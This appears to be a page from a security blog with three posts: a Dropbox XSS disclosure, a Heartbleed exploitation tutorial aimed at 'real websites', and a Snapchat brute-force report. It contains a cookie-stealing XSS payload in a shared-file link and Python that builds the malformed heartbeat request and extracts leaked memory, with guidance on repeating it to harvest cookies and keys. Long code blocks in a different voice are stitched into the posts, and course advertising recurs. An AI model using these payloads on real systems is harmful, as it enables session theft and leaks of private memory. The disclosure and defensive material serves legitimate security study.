The Hacking Post

(0Day) (won’t fix) Multiple XSS Vulnerabilities in the Dropbox Website and Dropbox iOS App

Dropbox lets you upload HTML and SWF files and view them online, both in your web browser and in the Dropbox iOS app.

I uploaded an HTML file containing some JavaScript code to Dropbox, then I shared it with another Dropbox user, and my JavaScript code got executed in his web browser and in his Dropbox iOS app :)

Black-hat hackers know how to exploit this through indirect methods (social engineering and phishing): the victim only has to open a shared file.

 

Here is a PoC video:

Dropbox refused to fix it. Their reply was:

 

Reid (Dropbox)

Jun 09 11:04

Hi Mohamed,

Sorry for the delay. Our security team has reviewed your report and has decided that this does not pose a security threat to Dropbox users.

This method would require a user to upload a malicious file onto their own account and then execute it. While it is possible to share a malicious html file to a user and have it executed in a similar manner, this is not considered a security vulnerability. Also, this issue is well mitigated by the fact that the file is hosted on dl-web.dropbox.com, and not on www.dropbox.com.

While it’s not considered a security vulnerability, the security team thanks you for your feedback on this issue and may provide a fix for it at a later date. If there is something we have overlooked please let me know.

We look forward to receiving reports from you in the future.

Best,
Reid

Bonus:

https://dl.dropbox.com/u/12545954/xss.swf

https://dl.dropbox.com/u/12545954/’%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E.html
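The mitigation Dropbox points to in its reply (hosting shared files on dl-web.dropbox.com rather than www.dropbox.com) only protects the main site's cookies; the uploaded script still runs inside the download origin, and the second bonus link above shows that even the filename can carry markup. The following is an added example, not Dropbox's code, of the response-header policy a file-sharing service can apply to user uploads: active content types (HTML, SWF, SVG, XML) are forced to download under a generic type, everything else is served inline with MIME sniffing disabled and a CSP sandbox, and the filename is sanitised before it is placed in Content-Disposition. The extension table, the function names and the choice of which types count as active are my own assumptions for the example.

```python
import posixpath

# Extension allowlist (assumption for this example): the served Content-Type is
# derived from the extension, never from the type the uploader declared.
EXT_TYPES = {
    ".html": "text/html", ".htm": "text/html", ".xhtml": "application/xhtml+xml",
    ".svg": "image/svg+xml", ".swf": "application/x-shockwave-flash",
    ".xml": "application/xml", ".png": "image/png", ".jpg": "image/jpeg",
    ".gif": "image/gif", ".txt": "text/plain",
}

# Types a browser (or the Flash plugin of the era) will run script from if they
# are rendered inline. These are never rendered from the shared-file origin.
ACTIVE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "application/x-shockwave-flash", "application/xml", "text/xml",
}


def content_type_for(filename):
    """Map a filename to an allowlisted Content-Type; unknown extensions become octet-stream."""
    ext = posixpath.splitext(filename)[1].lower()
    return EXT_TYPES.get(ext, "application/octet-stream")


def is_active_content(filename):
    return content_type_for(filename) in ACTIVE_TYPES


def safe_filename(filename, fallback="download"):
    """Strip anything that could break out of the quoted Content-Disposition
    parameter: control characters (header injection), quotes, backslashes,
    path separators and parameter separators."""
    cleaned = "".join(c for c in filename
                      if 32 <= ord(c) < 127 and c not in '"\\/;')
    cleaned = cleaned.strip() or fallback
    return cleaned[:255]


def headers_for_user_file(filename):
    """Response headers for serving one user-uploaded file from the download origin."""
    ctype = content_type_for(filename)
    headers = {
        # Do not let the browser guess a more dangerous type than the one we send.
        "X-Content-Type-Options": "nosniff",
        # If anything is rendered, it runs in an opaque origin with no script,
        # no forms, no cookies and no access to other files on this host.
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Cache-Control": "private, no-store",
    }
    name = safe_filename(filename)
    if ctype in ACTIVE_TYPES:
        # Never render: force a download under a generic type so shared
        # HTML/SWF/SVG cannot execute in any origin we control.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{name}"'
    else:
        headers["Content-Type"] = ctype
        headers["Content-Disposition"] = f'inline; filename="{name}"'
    return headers


if __name__ == "__main__":
    for f in ("xss.swf", "photo.png",
              "'\"><img src=x onerror=alert(document.cookie)>.html"):
        print(f, "->", headers_for_user_file(f))
```

Origin separation and this header policy are complementary: the separate host keeps the main site's session cookies out of reach, the attachment rule keeps the uploaded script from running at all, and the sandbox directive covers the case where a type slips through and is rendered anyway.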

 

My Ethical Hacking course on Udemy.com:

https://www.udemy.com/learn-the-basics-of-ethical-hacking-and-penetration-testing/

How to Exploit the Heartbleed Vulnerability in the REAL WORLD!

Hello my friends,

I made two videos showing you how to exploit the Heartbleed vulnerability on real websites!

You will need some Python scripts and Kali Linux to exploit it successfully.
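Both videos rely on the same mechanism: a TLS heartbeat request whose declared payload length is larger than the payload actually sent, which a vulnerable OpenSSL copies back from process memory. The following is an added example, not the author's script, that builds that request, parses the peer's answer and classifies it as vulnerable, not vulnerable or silent; it serves both the server-side scenario (you send the heartbeat to a server after the handshake) and the client-side one (a malicious server sends it to a vulnerable client). The sample responses are constructed bytes so it runs offline; the function names and the fake heap contents are my own assumptions.

```python
import struct

# TLS record content types (RFC 5246) and heartbeat message types (RFC 6520).
TLS_ALERT = 0x15
TLS_HEARTBEAT = 0x18
HB_REQUEST = 1
HB_RESPONSE = 2


def build_heartbeat_request(version=(3, 2), claimed_len=0x4000, payload=b""):
    """The classic malformed heartbeat: payload_length claims `claimed_len`
    bytes but only len(payload) bytes follow. A vulnerable peer copies
    claimed_len bytes from wherever the request landed in memory."""
    hb = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(hb)) + hb


def build_heartbeat_response(payload, version=(3, 2)):
    """Simulate a peer's heartbeat response (used here to construct test traffic)."""
    hb = struct.pack("!BH", HB_RESPONSE, len(payload)) + payload + b"\x00" * 16
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(hb)) + hb


def parse_tls_records(data):
    """Split a byte stream into (content_type, version, body) records; stops at a truncated one."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:
            break
        records.append((ctype, (vmaj, vmin), body))
        off += 5 + length
    return records


def classify_response(response, sent_payload=b""):
    """Return (verdict, leaked_bytes) for what the peer sent back after our heartbeat.

    vulnerable:     heartbeat response echoing more bytes than we sent; the excess
                    is memory copied from beyond our request.
    not_vulnerable: an alert, or a response echoing exactly what we sent.
    no_response:    nothing usable (patched peers silently drop the record).
    """
    leaked, saw_heartbeat = b"", False
    for ctype, _ver, body in parse_tls_records(response):
        if ctype == TLS_ALERT:
            return "not_vulnerable", b""
        if ctype != TLS_HEARTBEAT or len(body) < 3:
            continue
        hb_type, plen = struct.unpack("!BH", body[:3])
        if hb_type != HB_RESPONSE:
            continue
        saw_heartbeat = True
        echoed = body[3:3 + plen]
        if len(echoed) > len(sent_payload):
            leaked += echoed[len(sent_payload):]
    if leaked:
        return "vulnerable", leaked
    return ("not_vulnerable" if saw_heartbeat else "no_response"), b""


def printable_strings(blob, min_len=6):
    """Pull ASCII runs out of leaked memory (cookies, credentials, request lines)."""
    runs, cur = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        runs.append(cur.decode("ascii"))
    return runs


# Constructed sample traffic (no network): a vulnerable peer answers with a
# heartbeat response whose payload is heap memory. The real leak is 0x4000
# bytes per request; here a short fake buffer with another user's request in it.
FAKE_HEAP = (b"\x00" * 40
             + b"POST /login HTTP/1.1\r\nCookie: session=CONSTRUCTED-SESSION-TOKEN\r\n"
             + b"\x00" * 30)
VULNERABLE_RESPONSE = build_heartbeat_response(FAKE_HEAP)
# A patched peer answers with a fatal unexpected_message alert (or nothing at all).
PATCHED_RESPONSE = struct.pack("!BBBH", TLS_ALERT, 3, 2, 2) + b"\x02\x0a"


if __name__ == "__main__":
    print("request:", build_heartbeat_request().hex())
    verdict, leak = classify_response(VULNERABLE_RESPONSE)
    print(verdict, printable_strings(leak))
    print(classify_response(PATCHED_RESPONSE)[0])
```

To use it against a live target you would complete the TLS handshake first, send `build_heartbeat_request()` on the socket, read back the records and pass them to `classify_response`; repeating the request a few thousand times is what turns the leak into recovered cookies and keys. Only do that against systems you are authorised to test.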

 

How to exploit HeartBleed in Server Side Scenario (Real Websites):

How to exploit HeartBleed in Client Side Scenario (Real Websites):

TIP: Register your name and email to get a big discount once we release our new courses:

Learn the Basics of Ethical Hacking and Penetration Testing (Version 2014)

Bypassing and Evading Anti-Virus Course (Version 2014)

Share and enjoy :)

Account Brute-Forcing Vulnerability in Snapchat

Hello,

I found a critical vulnerability in the Snapchat app in late 2013 and reported it to their security team, and they replied that they had fixed it.

 

This vulnerability allowed anyone who knew your Snapchat email to brute-force your account’s password without any protection on Snapchat’s side: there was no lockout, no limit on attempts, and not even a CAPTCHA. I immediately reported it to them and they fixed it within 2 months.
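The two controls the post says were missing are a per-account failure counter with a temporary lockout and a per-IP rate limit, both applied before the password is checked. The following is an added example, not Snapchat's code, implementing both and running a simulated dictionary attack against an unprotected and a throttled login to show the difference; the thresholds (5 failures, 15-minute lockout, 20 attempts per IP per minute), the word list and the names are illustrative assumptions.

```python
import time
from collections import defaultdict, deque


class ManualClock:
    """Deterministic clock for the simulation; use time.monotonic in production."""

    def __init__(self, start=0.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class LoginThrottle:
    """Per-account lockout plus per-IP rate limit for a login endpoint (assumed thresholds)."""

    def __init__(self, max_failures=5, lockout_seconds=900,
                 ip_limit=20, ip_window=60, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.ip_limit = ip_limit
        self.ip_window = ip_window
        self.clock = clock
        self.failures = defaultdict(int)   # email -> consecutive failed attempts
        self.locked_until = {}             # email -> time the lock expires
        self.ip_hits = defaultdict(deque)  # ip -> timestamps of recent attempts

    def check(self, email, ip):
        """Decide before touching the password store. Returns (allowed, reason)."""
        now = self.clock()
        if self.locked_until.get(email, 0) > now:
            return False, "account locked"
        hits = self.ip_hits[ip]
        while hits and now - hits[0] >= self.ip_window:   # drop hits outside the window
            hits.popleft()
        if len(hits) >= self.ip_limit:
            return False, "ip rate limited"
        hits.append(now)
        return True, "ok"

    def record(self, email, success):
        """Update the per-account counter after the password check."""
        if success:
            self.failures.pop(email, None)
            self.locked_until.pop(email, None)
            return
        self.failures[email] += 1
        if self.failures[email] >= self.max_failures:
            self.locked_until[email] = self.clock() + self.lockout_seconds
            self.failures.pop(email, None)  # start fresh once the lock expires


def brute_force(throttle, email, ip, wordlist, real_password):
    """Simulate an attacker who knows the victim's email trying every guess from one IP.

    Returns (found, attempts_that_reached_the_password_check, attempts_blocked)."""
    sent = blocked = 0
    for guess in wordlist:
        allowed, _reason = throttle.check(email, ip)
        if not allowed:
            blocked += 1
            continue
        sent += 1
        ok = (guess == real_password)      # stands in for the real password check
        throttle.record(email, ok)
        if ok:
            return True, sent, blocked
    return False, sent, blocked


# Constructed inputs: a 51-word list with the real password last.
WORDLIST = [f"password{i}" for i in range(50)] + ["hunter2"]
VICTIM = "victim@example.com"
ATTACKER_IP = "203.0.113.5"


def compare():
    """Run the same attack against an unprotected endpoint and a throttled one."""
    clock = ManualClock()
    unprotected = LoginThrottle(max_failures=10**9, ip_limit=10**9, clock=clock)
    protected = LoginThrottle(clock=clock)
    return {
        "unprotected": brute_force(unprotected, VICTIM, ATTACKER_IP, WORDLIST, "hunter2"),
        "protected": brute_force(protected, VICTIM, ATTACKER_IP, WORDLIST, "hunter2"),
    }


if __name__ == "__main__":
    for name, (found, sent, blocked) in compare().items():
        print(f"{name}: found={found} sent={sent} blocked={blocked}")
```

A hard lockout is itself a lever: anyone who knows the victim's email can lock them out with five bad guesses, so production systems usually escalate to a CAPTCHA or step-up verification before locking, add growing delays between attempts, and take the client address from the trusted proxy header rather than the socket when behind a load balancer.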

 

SnapChat Security/Support Team reply:

Hi Mohamed,

Thank you for following up and for your patience. We’ve made some improvements in this regard, please let us know if you think we’ve adequately addressed the issues raised or if you have other feedback.
Happy new year!
Best,
Tobias
Here is a video showing you how I found and exploited the vulnerability:


NOTE:
You can join over 12,000 students around the world learning ethical hacking and penetration testing. Please join my course:

Awesome Security Courses from Egypt
